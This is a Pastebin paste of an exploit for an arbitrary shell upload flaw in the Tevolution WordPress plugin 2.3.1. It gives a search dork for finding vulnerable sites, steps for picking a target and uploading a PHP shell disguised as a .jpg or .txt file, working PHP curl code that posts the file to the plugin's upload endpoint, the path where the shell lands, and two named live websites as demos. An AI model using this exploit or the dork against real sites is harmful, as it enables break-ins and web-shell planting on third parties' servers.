API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 30th, 2017
81
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.20 KB | None | 0 0
raw download clone embed print report
  1. ######################
  2. # Exploit Title : Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability
  3. # Exploit Author : xBADGIRL21
  4. # Dork : inurl:/wp-content/plugins/Tevolution/tmplconnector
  5. # Vendor Homepage : https://templatic.com/
  6. # version : 2.3.1
  7. # Tested on: [ BackBox ]
  8. # skype:xbadgirl21
  9. # Date: 15/08/2016
  10. # video Proof : https://youtu.be/eVjW6rnaoSY
  11. ######################
  12. # [+] DESCRIPTION :
  13. ######################
  14. # [+] The Tevolution WordPress plugin enables advanced functionality in our themes.
  15. # [+] Some of the features it enables include custom post types, monetization options, custom fieldsa|
  16. # [+] An arbitrary shell upload web vulnerability has been detected in the Tevolution Plugin 2.3.1 and below.
  17. # [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory
  18. ######################
  19. # [+] USAGE :
  20. ######################
  21. # 1.- Download or Copy the Exploit C0des
  22. # 2.- Use Dork and Choose One Of the Website
  23. # 3.- Edit The Script
  24. # 4.- Upload Your File : shell.php.jpg or shell.php.txt
  25. ######################
  26. # [+] Exploit:
  27. ######################
  28. <?php
  29. $uploadfile="x21.PhP.Txt"; ///xBADGIRL21 ! Removing my name Doesn't mean
  30. you are the Founder or Owner of this ^_^
  31. $ch = curl_init("
  32. http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
  33. ");
  34. curl_setopt($ch, CURLOPT_POST, true);
  35. curl_setopt($ch, CURLOPT_POSTFIELDS,
  36. array('file'=>"@$uploadfile"));
  37. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  38. $postResult = curl_exec($ch);
  39. curl_close($ch);
  40. print "$postResult";
  41. ?>
  42. ######################
  43. # [+] Dev!l Path :
  44. ######################
  45. #
  46. http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/your-file-name.php.txt
  47. ######################
  48. # [+] Live Demo :
  49. ######################
  50. # http://guiagronicaragua.com
  51. # http://eventsinsuriname.com
  52. ######################
  53. # Discovered by : xBADGIRL21 - Unkn0wN
  54. # Greetz : All Mauritanien Hackers - NoWhere
  55. #######################
  56. ### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't
  57. Want me to Write His Name
  58. # so I Just Write the Exploit C0des ...........
  59. #######################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!